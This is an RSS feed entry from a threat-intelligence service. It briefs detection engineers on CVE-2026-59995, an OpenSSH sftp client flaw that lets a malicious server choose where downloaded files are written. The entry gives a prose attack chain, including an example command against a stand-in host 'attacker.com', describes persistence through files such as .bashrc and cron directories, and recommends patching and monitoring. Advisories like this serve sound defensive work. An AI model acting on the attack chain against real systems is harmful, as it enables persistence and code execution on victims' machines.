<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>OpenSSH Sftp &lt; 10.4 - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/openssh-sftp--10.4/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Thu, 09 Jul 2026 07:41:03 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/openssh-sftp--10.4/feed.xml" rel="self" type="application/rss+xml"/><item><title>CVE-2026-59995: OpenSSH SFTP Arbitrary File Placement Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-07-openssh-sftp-arbitrary-file-placement/</link><pubDate>Thu, 09 Jul 2026 07:41:03 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-openssh-sftp-arbitrary-file-placement/</guid><description>CVE-2026-59995 describes a vulnerability in the OpenSSH sftp client, specifically versions before 10.4, that allows an attacker to control the location of downloaded files when a user executes 'sftp server:/path .' against an attacker-controlled server, potentially leading to arbitrary file placement and subsequent system compromise.</description><content:encoded><![CDATA[<p>A critical vulnerability, CVE-2026-59995, has been identified in the OpenSSH SFTP client, affecting all versions prior to 10.4. This flaw allows a malicious SFTP server to manipulate the client's file placement logic when a user executes the command <code>sftp server:/path .</code>. The vulnerability stems from insufficient constraints on the target location during file downloads, enabling the attacker-controlled server to dictate where files are saved on the victim's system. This could lead to malicious files being written to sensitive directories, potentially establishing persistence, achieving arbitrary code execution, or causing denial of service. While specific exploitation in the wild has not been detailed, the vulnerability poses a significant risk to users who interact with untrusted SFTP servers. This brief highlights the mechanics of the vulnerability and recommended mitigations for detection engineers.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker provisions a malicious SFTP server specifically configured to exploit CVE-2026-59995.</li>
<li>The attacker crafts a lure, such as a deceptive communication or a malicious link, to entice a victim into connecting to their SFTP server.</li>
<li>The victim user, unaware of the server's malicious intent, executes the <code>sftp attacker.com:/remote/path .</code> command using a vulnerable OpenSSH client (version before 10.4).</li>
<li>During the download process, the malicious SFTP server responds with specially crafted directory listings or manipulated path information to the client.</li>
<li>Due to the parsing vulnerability (CVE-2026-59995), the OpenSSH client misinterprets the server's response regarding the intended download location.</li>
<li>The client then proceeds to write the downloaded files to an arbitrary, attacker-controlled location on the victim's local filesystem, outside of the current working directory.</li>
<li>The attacker places malicious executable binaries, scripts, or configuration files (e.g., within startup directories, user profile scripts, or system-critical locations).</li>
<li>Upon a subsequent system reboot, user login, or specific application execution, the arbitrarily placed malicious file is triggered, leading to persistence, privilege escalation, or arbitrary code execution on the victim's system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The impact of successful exploitation of CVE-2026-59995 can range from denial of service to full system compromise. If an attacker can place malicious executables in startup folders, user profile scripts (like <code>.bashrc</code>, <code>.profile</code>), or other auto-execution paths, they can achieve persistence and potentially arbitrary code execution with the user's privileges. Placement of corrupted or critical configuration files could lead to system instability or denial of service. While the vulnerability requires user interaction to connect to a malicious server, the ability to bypass intended download locations poses a significant security risk, allowing attackers to bypass standard download protections and system integrity checks.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Prioritize patching OpenSSH clients to version 10.4 or later immediately to mitigate CVE-2026-59995.</li>
<li>Educate users about the risks of connecting to untrusted SFTP servers and executing download commands against them.</li>
<li>Implement monitoring for unusual file writes to system-critical or user-profile directories, especially those typically used for persistence (e.g., startup folders, <code>/etc/cron.d</code>, <code>.bashrc</code>, <code>.profile</code>).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">threat</category><category>vulnerability</category><category>client-side</category><category>arbitrary-file-placement</category><category>openssh</category><category>sftp</category></item></channel></rss>